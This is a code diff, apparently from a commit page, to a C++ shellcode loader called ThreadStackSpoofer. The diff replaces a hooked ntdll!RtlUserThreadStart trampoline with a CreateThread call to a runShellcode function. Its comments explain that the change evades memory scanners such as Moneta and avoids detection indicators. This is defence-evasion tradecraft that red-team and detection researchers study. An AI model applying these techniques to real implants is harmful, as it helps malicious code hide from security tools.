     193 + // https://github.com/mgeeky/ThreadStackSpoofer/blob/ec0237c5f8b1acd052d57562a43f40a20752b5ca/ThreadStackSpoofer/main.cpp#L417
     194 + // showed how we can start our shellcode from temporarily hooked ntdll!RtlUserThreadStart+0x21 .
     195 + //
     196 + // That approached was a bit flawed due to the fact, the as soon as we introduce a hook within module,
     197 + // even when we immediately unhook it the system allocates a page of memory (4096 bytes) of type MEM_PRIVATE
     198 + // inside of a shared library allocation that comprises of MEM_IMAGE/MEM_MAPPED pool.
    412 199   //
    413  - // In order for our thread to blend in more effectively, we start it from the ntdll!RtlUserThreadStart+0x21
    414  - // function that is hooked by placing a trampoline call into our shellcode. After a second, the function will be
    415  - // unhooked to remove easy leftovers (IOCs) and maintain process' stability.
     200 + // Memory scanners such as Moneta are sensitive to scanning memory mapped PE DLLs and finding amount of memory
     201 + // labeled as MEM_PRIVATE within their region, considering this (correctly!) as a "Modified Code" anomaly.
    416 202   //
    417  - LPVOID fakeAddr = (LPVOID)(((ULONG_PTR)GetProcAddress(GetModuleHandleA("ntdll"), "RtlUserThreadStart")) + 0x21);
    418  - 
    419  - BYTE origRtlUserThreadStartBytes[16];
    420  - HookTrampolineBuffers buffers = { 0 };
    421  - buffers.previousBytes = buffers.originalBytes = origRtlUserThreadStartBytes;
    422  - buffers.previousBytesSize = buffers.originalBytesSize = sizeof(origRtlUserThreadStartBytes);
    423  - if (!fastTrampoline(true, (BYTE*)fakeAddr, alloc, &buffers))
    424  - return false;
    425  -
    426  - shellcode.clear();
    427  - 
     203 + // We're unable to evade this detection for kernel32!Sleep however we can when it comes to ntdll. Instead of
     204 + // running our shellcode from a legitimate user thread callback, we can simply run a thread pointing to our
     205 + // method and we'll instead jump to the shellcode from that method.
    428 206   //
    429  - // The shellcode starts from the hooked ntdll!RtlUserThreadStart+0x21
     207 + // After discussion I had with @waldoirc we came to the conclusion that in order not to bring other IOCs it is better
     208 + // to start shellcode from within EXE's own code space, thus avoiding detections based on `ntdll!RtlUserThreadStart+0x21`
     209 + // being an outstanding anomaly in some environments. Shout out to @waldoirc for our really long discussion!
    430 210   //
    431 211   thread.reset(::CreateThread(
    432 212   NULL,
    433 213   0,
    434  - (LPTHREAD_START_ROUTINE)fakeAddr,
    435  - 0,
     214 + (LPTHREAD_START_ROUTINE)runShellcode,
     215 + alloc,
    436 216   0,
    437 217   0
    438 218   ));
    439  - 
    440  - ::SleepEx(1000, false);
    441  - 
    442  - // Here we restore original stub bytes of that API.
    443  - if (!fastTrampoline(false, (BYTE*)fakeAddr, alloc, &buffers))
    444  - return false;
    445 219   
    446 220   return (NULL != thread.get());
    447 221  }
    skipped 18 lines
    466 240   
    467 241   if (spoof)
    468 242   {
    469  - log("[.] Thread call stack will be spoofed.");
    470  - if (!initStackSpoofing())
    471  - {
    472  - log("[!] Could not initialize stack spoofing!");
    473  - return 1;
    474  - }
    475  - 
    476 243   log("[.] Hooking kernel32!Sleep...");
    477 244   if (!hookSleep())
    478 245   {
    skipped 22 lines
  • images/legit-call-stack.png
  • images/spoofed.png
  • images/spoofed2.png
Please wait...
Page is in error, reload to recover